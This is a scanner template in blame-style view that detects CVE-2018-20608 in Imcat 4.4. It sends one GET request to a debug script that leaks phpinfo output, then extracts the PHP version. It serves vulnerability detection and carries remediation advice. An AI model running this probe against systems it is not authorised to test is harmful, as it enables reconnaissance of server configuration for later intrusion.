2023-07-25 17:43:09 +00:00
|
|
|
id: CVE-2018-20608
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Imcat 4.4 - Phpinfo Configuration
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: high
|
|
|
|
description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI.
|
2023-09-06 12:57:14 +00:00
|
|
|
remediation: |
|
|
|
|
Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability.
|
2023-07-25 17:43:09 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-20608
|
|
|
|
classification:
|
2023-08-31 11:46:18 +00:00
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
2023-07-25 17:43:09 +00:00
|
|
|
cve-id: CVE-2018-20608
|
2023-08-31 11:46:18 +00:00
|
|
|
cwe-id: CWE-200
|
|
|
|
epss-score: 0.03654
|
2023-11-27 09:19:41 +00:00
|
|
|
epss-percentile: 0.90703
|
2023-09-06 12:57:14 +00:00
|
|
|
cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:*
|
2023-07-25 17:43:09 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: txjia
|
|
|
|
product: imcat
|
2023-07-25 17:43:09 +00:00
|
|
|
tags: cve,cve2018,imcat,phpinfo,config
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "PHP Extension"
|
|
|
|
- "PHP Version"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- '>PHP Version <\/td><td class="v">([0-9.]+)'
|
|
|
|
part: body
|
2023-11-27 10:10:24 +00:00
|
|
|
# digest: 480a0045304302207bbfe695fdf3797ec038d2e255d4b16760633a22259b96aa3b313c4c8a17b536021f42982c5df00518d9168b901393139e1d9b6495d8e642c24a4005998844225d:922c64590222798bb761d5b6d8e72950
|